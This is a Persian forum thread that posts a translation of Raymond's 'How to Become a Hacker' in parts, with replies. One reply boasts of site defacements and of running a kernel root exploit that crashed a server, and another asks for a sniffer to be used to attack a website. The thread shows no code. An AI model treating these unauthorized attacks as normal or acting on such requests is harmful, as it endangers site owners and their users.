من يک متن در مورد اطلاعاتی که مبتديان برای کار با يونيکس و اينترنت لازم دارند ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشته‌ام. اگر شما يک مبتدی هستيد من نصب هيچ‌کدام (يونيکس و لينوکس) توسط خودتان را توصيه نمی‌کنم.برای نصب لينوکس، يک گروه محلی از کاربران لينوکس را پيدا کنيد و از آنها کمک بخواهيد.

mazi_z_PSP
20-05-2007, 12:19
۳-یاد بگيريد که چگونه از وب استفاده کنيد و HTML بنويسيد
اکثر دستاوردهای جامعه‌ی هکرها کارهايشان را در پشت پرده انجام می‌دهند. آنها به کارکرد کارخانه‌ها، ادارات و دانشگاه‌ها کمک می‌کنند بدون آنکه تاثير قابل رويتی بر زندگی ديگران بگذارند. در اين ميان وب يک استثنای بزرگ است. سرگرمی بزرگ هکرها که حتی سياستمداران اعتراف می‌کنند که در حال تغيير دادن دنياست. به اين دليل (و دلايل زياد ديگر) لازم است بدانيد که با وب چگونه کار ‌کنید.
اين بدان معنا نيست که فقط استفاده از يک مرورگر را ياد بگيريد. (هر کسی می‌تواند اين کار را انجام دهد) شما بايد HTML (زبان نشانه گذاری وب) را یاد بگیرید. اگر شما برنامه‌نويسی بلد نيستيد، نوشتن HTML به شما تعدادی عادت ذهنی می‌دهد که اين عادات به يادگيری شما درآينده کمک خواهد کرد. پس يک صفحه‌ی خانگی درست کنيد و سعی کنيد که از XHTML که زبان دقيق‌تری نسبت به HTML سنتی است، بيشتر استفاده کنيد. (آموزش‌های مقدماتی خوبی در اين زمينه وجود دارد. مانند اين ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]))
اما صرفاً داشتن يک صفحه‌ی خانگی شما را يک هکر نمی‌کند. اينترنت پر از صفحات وب است. اکثر آنها بی‌هدف، بی‌محتوا، آشغال و آشغال‌های بسيار جذاب هستند. يادتان باشد که محتوای تمام آشغال‌ها يکسان‌ است. (برای اطلاعات بيشتر در اين مورد صفحه‌ی جهنم HTML ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد)
برای مفيد بودن صفحه‌ی شما بايد بامحتوا باشد. صفحه‌ی شما بايد جالب باشد و/يا برای هکرهای ديگر مفيد باشد. اين موضوع ما را به بحث بعدی می‌کشاند.
۴-اگر زبان انگليسی شما خوب نيست، آن را ياد بگيريد
شخصاً به عنوان يک فرد انگليسی زبان آمریکایی قبلاً از اين پيشنهاد ناراضی بودم.چرا که ممکن بود به عنوان نوعی استعمارطلبی فرهنگی تلقی شود. اما افراد متعددی که زبانهای مادری ديگری داشتند از من خواستند که بگويم انگليسی زبان کاربردی فرهنگ هکرها و اينترنت است. شما بايد برای فعاليت در جامعه‌ی هکرها آن را بدانيد.
در گذشته حوالی سال ۱۹۹۱ من ياد گرفتم که اکثر هکرهايی که انگليسی را به عنوان زبان دوم ياد گرفته‌اند، حتی آنهایی که زبان مادری یکسانی دارند نيز آن را در بحث‌های فنی بکار می‌برند. من فهميدم که زبان انگليسی دايره‌ی لغات وسيع‌تری نسبت به هر زبان ديگری دارد و ابزار بهتری برای کار است. به همين دليل ترجمه‌های کتاب‌های تخصصی که به زبان انگليسی نوشته شده‌اند زمانی که تمام کلمات آنها ترجمه می‌شوند، اغلب خوب نيستند. لينوس توروالدز که يک فنلاندی است. کد لينوکس خودش را به زبان انگليسی توضيح داد (او تابحال هرگز به طرز ديگری عمل نکرده است). تسلط او به زبان انگليسی عامل مهمی در ايجاد يک جامعه‌ی جهانی از توسعه دهندگان برای لينوکس بود. اين نمونه ارزش پيروی دارد.

Naser_helboy
21-05-2007, 20:42
با تشکر از دوستانی که نظر دادن. اینم ادامه مقالات

کی نظر داده

من که چیزی ندیدم

E2
21-05-2007, 21:02
بابا کپی رایت هم یه حدی داره آواتر منو گرفتی با فتوشاپ دسکاری کردی واسه خودت گذاشتی؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

واقعا کههههههههه

mazi_z_PSP
21-05-2007, 21:17
کی نظر داده

من که چیزی ندیدم
خب اینم واسه بازار گرمی بود!!!

mazi_z_PSP
21-05-2007, 21:19
بابا کپی رایت هم یه حدی داره آواتر منو گرفتی با فتوشاپ دسکاری کردی واسه خودت گذاشتی؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

واقعا کههههههههه
منظورتو متوجه نميشم؟؟؟ این حرفا يعنی چی؟

v65j
22-05-2007, 01:06
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی

mazi_z_PSP
22-05-2007, 12:15
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
اصلا از لحنت خوشم نيامد.اگر ميخوای تند حرف بزنی من از تو بدترم انقدر بهت حرف ميزنم تا هم تورو هم منو اخراج کنن.به پيقام خصوصی هم کاری ندارم. اینجا هرچی گزاشتم برايه مبتدی هستش برايه کسايی که هيچی حاليشون نيست. کم کم حرفه ای ميشه مقالات و رويه وی بی تمرکز ميکنه. شرمنده که اینجوری حرف زدم اما اگر فکر ميکنی اینا بدرد نميخورن ميتونی به این تاپيک کمک کنی و چيزای بهتری بزاری.من با آقوش باز ازت پزيرايی ميکنم.بر فرض که من هيچی از این چيزايی که گفتی بلد نيستم.اما بايد بهت بگم که خيلی ها اینجا مثله منن و اینجا فقط برايه حرفه ای هايی نيست که مثل تو سر تا پا غرور گرفتّشون. در هر صورت از نظراتت ممنونم

mazi_z_PSP
22-05-2007, 12:21
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
از این چيزايی که گفتی مقاله بزار

mazi_z_PSP
22-05-2007, 12:28
نويسنده: Eric Steven Raymond (esr@thyrsus.com)مترجم: ميثم فرضعلی‌پور (meisam460@hotmail.com?subject=HTBH)

وضع فرهنگ هکرها

مانند اکثر فرهنگ‌هايی که مبتنی بر اقتصاد پولی نيستند، جامعه‌ی هکرها بر پايه‌ی شهرت و اعتبار استوار است. شما سعی می‌کنيد که مسائل جالب را حل کنيد اما اينکه آنها چقدر جالب هستند و اينکه راه‌حل شما واقعاً چقدر خوب است، موضوعی است که در آن فقط افرادی که از نظر فنی هم‌سطح شما و بالاتر هستند می‌توانند نظر بدهند. هنگامی که شما وارد بازی هکرها می‌شوید ياد می‌گيريد که مدارجتان را با -توجه به نظری که ديگران راجع به مهارت شما دارند- بالاتر از ديگران نگاه داريد. (به همين دليل شما يک هکر واقعی نمی‌شويد مگر آنکه هکرهای ديگر شما را هکر بنامند) اين واقعيت با تصويری از هکری به عنوان کاری در انزوا به فراموشی سپرده شده است.
همچنين با يک تابو در فرهنگ هکری(که البته در حال از بين رفتن است ولی کماکان وجود دارد) برخلاف پذيرفتن اينکه خود فرد يا اعتبار او در بين ديگران در انگيزه‌ی فرد موثر هستند. انسان شناسان جامعه‌ی هکرها را فرهنگ هدیه می‌نامند. شما اعتبار و مقام به دست می‌آوريد ولی نه به وسيله‌ی تسلط داشتن بر ديگران، زيبايی يا داشتن آنچه ديگران می‌خواهند. بلکه با بخشش مخصوصاً در اختيار ديگران قرار دادن خلاقيت و حاصل مهارت‌های خود. به طور کلی ۵ نوع کار وجود دارد که شما می‌توانيد با انجام آنها در بين هکرها محبوبيت کسب کنيد:

mazi_z_PSP
22-05-2007, 12:29
۱-نرم‌افزار منبع‌باز بنويسيد
اولين(مهم‌ترين و متداول‌ترين) کار، نوشتن برنامه‌هايی که هکرهای ديگر فکر می‌کنند جالب يا مفيد هستند و انتشار کد منبع آنها در ميان هکرهاست. (در گدشته ما به چنين کارهايی Free Software می‌گفتيم. اما اين اصطلاح مردم بسيار زيادی که نمی‌دانستند Free در اينجا به چه معنايی است را گيج می‌کرد. بنابراين اکثر ما (بر طبق آمار حاصل از محتوای صفحات وب، با حداقل نسبت ۲ به ۱) اکنون ترجيح می‌دهيم که ار اصطلاح نرم‌افزار Open Source ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) استفاده کنيم) محترم‌ترين افراد در جامعه‌ی هکرها افرادی هستند که برنامه‌های بزرگ و توانمند نوشته‌اند که افراد بسياری به آن نرم‌افزار‌ها احتياج دارند و آن نرم‌افزارها را در کل جامعه‌ی هکرها منتشر کرده‌اند تا همه‌ی افراد بتوانند از آن استفاده کنند.

mazi_z_PSP
22-05-2007, 12:30
۲-به تست و اشکال‌زدایی نرم‌افزار‌های منبع‌باز کمک کنيد
همچنين کسانی که عهده‌دار اشکال‌يابی و اشکال‌زدايی نرم‌افزارها می‌شوند نيز مفيد هستند. در دنيای امروزی ما ناگزیر به صرف بيشتر وقت توسعه‌ی نرم‌افزارهايمان در مرحله‌ی اشکال زدايی هستیم. به همين دليل هر نويسنده‌ی نرم‌افزار منبع باز به شما خواهد گفت که آزمايشگران خوب مرحله‌ی بتا (آزمايشگران مرحله‌ی بتا کسانی هستند که می‌دانند که چگونه علائم اشکال را دقيق توضيح دهند، محل اشکالات را به خوبی مشخص کنند و می‌توانند با اشکالاتی که در نسخه‌های اوليه وجود دارد کنار بيايند و چند روش تشخيص محل عيب ساده را انجام بدهند) به اندازه‌ی طلای هم‌وزنشان ارزشمندند به قدری که حتی یکی از آنها می‌توانند مرحله‌ی اشکال زدايی را از يک کابوس طولانی و خسته کننده را به يک دردسر عبرت‌آموز تبديل کنند.
اگر شما يک مبتدی هستيد، سعی کنيد که برنامه‌ی در دست توسعه که مورد علاقه‌ی شما باشد، پيدا کنيد و تلاش کنيد تا يک آزمايشگر مرحله‌ی بتای خوب باشيد. يک فرآيند طبيعی برای پيشرفت از کمک به آزمايش نرم‌افزارها تا اشکال زدايی آنها و از اشکال زدايی تا تغيير دادن آنها وجود دارد. به اين ترتيب شما چيزهای زيادی ياد می‌گيريد و روابط خوبی با کسانی که در آينده به شما کمک خواهند کرد، پيدا می‌کنيد.

mazi_z_PSP
22-05-2007, 12:31
۳-اطلاعات مفيد را منتشر کنيد
يک کار خوب ديگر جمع‌آوری و انتشار اطلاعات مفيد و جالب در صفحات وب يا متونی مانند «مجموعه‌ی پرسش‌های متداول» و در اختيار ديگران قرار دادن آنها است. گردانندگان مجموعه‌های پرسش‌های متداول بزرگ در زمينه‌های فنی، تقريباً به اندازه‌ی نويسندگان نرم‌افزارهای منبع‌باز محبوبيت کسب می‌کنند.
۴-به انجام کارهای زيربنايی کمک کنيد
جامعه‌ی هکرها (و به تبع آن توسعه‌ی فنی مهندسی اينترنت) به وسيله‌ی داوطلبان پيشرفت می‌کند. کارهای ضروری و خسته کننده‌ی بسياری وجود دارند که برای ادامه‌ی پيشرفت لازم است انجام داده شوند. مانند مديريت فهرست‌های پستی، نظارت بر گروههای خبری، مديريت و نگهداری سايت‌های بزرگ آرشيو نرم‌افزارها، توسعه‌ی RFC ها و استانداردهای فنی ديگر نظير آنها.
افرادی که چنين کارهايی را به خوبی انجام می‌دهند، در بين ديگران بسيار مورد احترام قرار می‌گيرند. زيرا هر کسی می‌داند که اين کارها به مقدار زيادی وقت نياز دارند و به اندازه‌ی بازی با کدمنبع نرم‌افزارها جالب نيستند. انجام چنين کارهايی نشانه‌ی فداکاری افراد است.
۵-در انتشار فرهنگ هکرها همکاری کنيد
و بالاخره شما می‌توانيد در انتشار خود فرهنگ هکرها مفيد باشيد. (برای مثال با نوشتن يک مقاله‌ی دقيق و صحيح در مورد اينکه چگونه يک هکر بشويم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شما هنگام شروع در موقعیتی نيستيد که بتوانيد چنين کاری را انجام بدهيد مگر آنکه برای مدتی در بين هکرها باشيد و به خاطر يکی از چهار شيوه‌ی بالا مشهور شده باشيد. جامعه‌ی هکرها به طور مشخص رهبری ندارد. اما اين فرهنگ قهرمان‌ها، پيشکسوتان، مورخان و سخنگويان خودش را دارد.اگر شما به مدت زيادی در بين هکرها باشيد، احتمالاً به يکی از اين گروه‌ها خواهيد پيوست. اما مراقب باشيد:‌هکرها آشکارا پيشکسوتان خودشان را اذيت می‌کنند. پس مسلماً رسيدن به اين درجه از شهرت، بيشتر از تلاش برای بدست آوردن آن خطرناک است. شما بايد مراقب جايگاه خودتان باشيد و به جای تلاش برای رسيدن به شهرت کاری کنيد که اين موقعيت در مسير شما قرار گيرد. اين باعث پيشرفت شما خواهدشد و سپس در مقام خودتان متواضع و مهربان باشيد.

mazi_z_PSP
22-05-2007, 12:56
از دوست عزيزم Fares_N_Mcse هم از کمک به خاطر پيدا کردن مقالات تشکر ميکنم

mazi_z_PSP
22-05-2007, 20:54
ارتباط بين هکر و نرد(Nerd)
برخلاف تصور مردم برای هکر شدن لازم نيست که يک نرد باشيد .گرچه اين سودمند است و اکثر هکرها در واقع نرد هستند. داشتن روابط اجتماعی خوب به شما کمک می‌کند که بر روی مسائل واقعاً مهم مانند فکر کردن و هکری تمرکز کنيد. به همين دليل اکثر هکرها عنوان نرد را برای خود انتخاب کرده‌اند و حتی اصطلاح غليظ‌تر geek را به نشانه‌ی افتخار به کار می‌برند. اين راهی برای نشان دادن استقلال آنها از عرف معمول در جامعه است.
برای بحث گسترده‌تر در اين مورد صفحه‌ی geek ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر شما می‌توانيد به‌خوبی بر روی هکری تمرکز کنيد تا يک هکر خوب باشيد و هم به زندگی‌تان برسید، اين خوب است. امروزه اين کار بسيار راحت‌تر از زمانی است که من يک مبتدی بودم (در دهه‌ی ۱۹۷۰).
امروزه برخورد هکرها با افراد مبتدی بسيار دوستانه‌تر است. همچنين تعداد افرادی که متوجه می‌شوند هکرها اغلب عاشقان خوب و همسردار هستند، در حال افزايش است. اگر شما به دليل نرد بودن، به هکری علاقه‌مند هستيد، اين هم خوب است. حداقل شما مشکل تمرکز حواس نداريد. شايد شما هم بعداً از انزوا خارج شويد.

mx_2dar
23-05-2007, 08:36
در مورد نرم افزار snifer توضیح بدید و طرز کارش رو هم بگید و یه سایت رو باهاش بترکونید

تکنیک برتر
23-05-2007, 10:01
من هی می خواهم تو مطالب هک کرک و ویروس نویسی قاطی نشم ولی دیگه مشم.
راستش یه قزیه هست همه بدونن ما تو جائی که کار می کنیم هر ماه نقشه ای به ما میدن که با رنگ مثل (نرم افزار پاندا) نشان می دهد که در کدام کشور ها هک و ویروس نویسی زیاد است که نقشه کشور ایران به عنوان ویروس نویسی قرمز یعنی اول و در هک نارنجی یعنی دوم این نشونه این است که ایران هکرهاش دیگه.... غوغا کردن.

majj
23-05-2007, 16:53
ارتباط بين هکر و نرد(Nerd)
برخلاف تصور مردم برای هکر شدن لازم نيست که يک نرد باشيد .گرچه اين سودمند است و اکثر هکرها در واقع نرد هستند. داشتن روابط اجتماعی خوب به شما کمک می‌کند که بر روی مسائل واقعاً مهم مانند فکر کردن و هکری تمرکز کنيد. به همين دليل اکثر هکرها عنوان نرد را برای خود انتخاب کرده‌اند و حتی اصطلاح غليظ‌تر geek را به نشانه‌ی افتخار به کار می‌برند. اين راهی برای نشان دادن استقلال آنها از عرف معمول در جامعه است.
برای بحث گسترده‌تر در اين مورد صفحه‌ی geek ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر شما می‌توانيد به‌خوبی بر روی هکری تمرکز کنيد تا يک هکر خوب باشيد و هم به زندگی‌تان برسید، اين خوب است. امروزه اين کار بسيار راحت‌تر از زمانی است که من يک مبتدی بودم (در دهه‌ی ۱۹۷۰).
امروزه برخورد هکرها با افراد مبتدی بسيار دوستانه‌تر است. همچنين تعداد افرادی که متوجه می‌شوند هکرها اغلب عاشقان خوب و همسردار هستند، در حال افزايش است. اگر شما به دليل نرد بودن، به هکری علاقه‌مند هستيد، اين هم خوب است. حداقل شما مشکل تمرکز حواس نداريد. شايد شما هم بعداً از انزوا خارج شويد.

اقا ممنون از اموزش خوبتون
خسته نباشید لطفا ادامه بدید

majj
23-05-2007, 16:54
برام جالبه بدونم شما کجا کار میکنید که هرماه لیست این کشورها رو به شما میدن

Payman_62
24-05-2007, 02:01
سلام.
تکنیک برتر جان کدوم کشور تو هک رنگ قرمز داره؟
فکر میکنم برزیل یا هند باشه.

Payman_62
24-05-2007, 02:21
سلام.
mx_2dar
HoseinVig
Naser_helboy

لطفا پست بی ارتباط به هک ندید.

تکنیک برتر
24-05-2007, 03:16
سلام پیمان جان
آمریکا ژاپن آلمان هند

mazi_z_PSP
24-05-2007, 22:00
البته دوستان تا اونجايی که من اطلاع دارم يکی از بزرگ ترين کشور های جهان تو هک روسيه هستش.و این رو هم ميدونم که نسخه های اوليه برنامه های معروف مثل ويستا تو این کشور هک ميشن.

mazi_z_PSP
24-05-2007, 22:00
من هی می خواهم تو مطالب هک کرک و ویروس نویسی قاطی نشم ولی دیگه مشم.
راستش یه قزیه هست همه بدونن ما تو جائی که کار می کنیم هر ماه نقشه ای به ما میدن که با رنگ مثل (نرم افزار پاندا) نشان می دهد که در کدام کشور ها هک و ویروس نویسی زیاد است که نقشه کشور ایران به عنوان ویروس نویسی قرمز یعنی اول و در هک نارنجی یعنی دوم این نشونه این است که ایران هکرهاش دیگه.... غوغا کردن.
خيلی خيلی خوشحال ميشم بيشتر به اینجا سر بزنی

mazi_z_PSP
24-05-2007, 22:01
در مورد نرم افزار snifer توضیح بدید و طرز کارش رو هم بگید و یه سایت رو باهاش بترکونید
سعی ميکنم پيدا کنم اما از دوستان ديگه هم ميخوام که اگه مطلبی دارن صبر نکنن

mazi_z_PSP
24-05-2007, 22:05
سلام.
mx_2dar
HoseinVig
Naser_helboy

لطفا پست بی ارتباط به هک ندید.
Thanks
ممنون

mazi_z_PSP
24-05-2007, 22:07
نويسنده: Eric Steven Raymond (esr@thyrsus.com)
مترجم: ميثم فرضعلی‌پور (meisam460@hotmail.com?subject=HTBH)

نکات مهم
دوباره می‌گويم برای هکر شدن شما ناچاريد که طرز فکر هکرها را يادبگيريد. کارهايی وجود دارند که شما هنگامی که در کنار کامپيوتر نيستيد، می‌توانيد انجام بدهيد. اين کارها به هکر شدن شما کمک می‌کنند اما جايگزينی برای هکری نيستند (هيچ چيز ديگری نيست) اما اکثز هکرها اين کارها را انجام می‌دهند و احساس می‌کنند که اينها به نوعی به اساس هکری ارتباط دارند.
ياد بگيريد که زبان مادری خودتان را به خوبی بنويسيد. گرچه اين پندار عمومی که هکرها نويسندگان خوبی نيستند، وجود دارداما تعداد زيادی از هکرها (شامل تمام هکرهای ماهری که من می‌شناسم) نويسندگان بسيار توانايی هستند. داستان‌های علمی-تخیلی بخوانيد و به بحث‌هايی در مورد داستان‌های علمی-تخیلی بپيونديد (اين يک روش خوب برای آشنا شدن با هکرها و هکردوستان است).
يکی از شاخه‌های هنرهای رزمی را ياد بگيريد. شيوه‌ی پرورش ذهنی که برای هنرهای رزمی لازم است، در بسياری از جهات با کاری که هکر‌ها انجام می‌دهند، مشابه است. پرطرفدارترين شاخه‌ها در ميان هکرها، هنرهای رزمی بدون سلاح هستند. مانند: نکواندو، کاراته، وينگ چون، آيکيدو و جوجيتسو. هنرهای شمشير بازی غربی و آسيايی نيز طرفداران قابل ملاحظه‌ای دارند. در جاهايی که شليک با هفت‌تير قانونی است، اين شاخه نيز طرفداران زيادی از اواخر دهه‌ی ۹۰ پيدا کرده است. بهترين هنر‌های رزمی برای هکرها آنهايی هستند که به پرورش ذهنی، تمرکز اعصاب و کنترل خود بيشتر از قدرت، ورزش‌گرايی و سختی جسمی اهميت می‌دهند.
مديتيشن را به طور منظم تمرين کنيد. Zen همواره در ميان هکرها محبوب است. (شما می‌توانيد از Zen استفاده کنيد بدون اينکه مجبور شويد به مذهب جديدی روی بياوريد يا از مذهبی که داريد دست بکشيد.) سبک‌های ديگر نيز مفيد هستند اما مراقب باشيد يکی از آن سبک‌هايی را انتخاب کنيد که نيازی به باور عقايد ديوانه‌وار نداشته باشد.
مهارت‌های شنوايی خودتان را در زمينه‌ی موسيقی توسعه دهيد. باد بگيريد که بتوانيد از نوع خاصی از موسيقی را درک کرده و از آن لذت ببريد. ياد بگيريد که چگونه يک ساز را خوب بنوازيد يا چگونه آواز بخوانيد.
مهارت خودتان را در جناس و بازی با کلمات بيشتر کنيد.
هر قدر که تعداد بيشتری از اين کارها را از قبل انجام بدهيد، استعداد ذاتی شما برای هکر شدن به همان اندازه بيشتر است. دليل انجام اين کارها به طور واضح معلوم نيست اما آنها به ترکيبی از مهارت‌های نيمکره‌ی راست و چپ مغز ارتباط دارند که به نظر می‌آيد مهم باشد. هکرها بايد در لحظه‌ای که به مسئله‌ای فکر می‌کنند، هم به تفکر منطقی قادر باشند و هم به نمودهای ظاهری مسئله توجه کنند.
زمانی که کار می‌کنيد، چنان با شور و شوق کار کنيد که انگار بازی می‌کنيد و چنان با دقت بازی کنيد که انگار کار می‌کنيد. برای هکرهای واقعی مرزی ميان بازی، کار، علم و هنر وجود ندارد. اين موضوعات با يکديگر ادغام می‌شوند تا يک سازندگی سطح بالاو مفرح به وجود آورند. شما نبايد به دامنه‌ی کوچکی از مهارت‌ها محدود بشويد.
گرچه معمولاً هکرها خوشان را به عنوان برنامه‌نويس معرفی می‌کنند اما اکثر آنها در زمينه‌های مرتبط نيز مهارت دارند. مديريت سيستم، طراحی صفحات وب و اشکال يابی سخت افزار کامپيوترهای شخصی موارد رايج هستند. يک هکر که مديريت سيستم را بر عهده دارد، به احتمال زياد در اسکریپت نويسی و طراحی صفحات وب مهارت دارد.
هکرها هيچ‌گاه کاری را نصف و نيمه انجام نمی‌دهند. اگر آنها در زمينه‌ای وقت صرف می‌کنند، حتماً تصميم گرفته‌اند در آن زمينه بسيار خوب باشند.
و بالاخره چند کار که نبايد انجام بدهيد:
هرگز از نامهای مستعار احمقانه و پرزرق‌وبرق استفاده نکنيد
هرگز در جنگ‌های سرزنش ديگران در يوزنت (يا هر جای ديگری) شرکت نکنيد.
هرگز خودتان را يک ولگرد اينترنت (Cyber Punk) نناميد و هيچ گاه وقت خودتان را با کسی که چنين کاری را انجام می‌دهد، تلف نکنيد.
هرگز نوشته‌های پر از غلط املائی و دستور زبانی را پست يا ميل نکنيد.
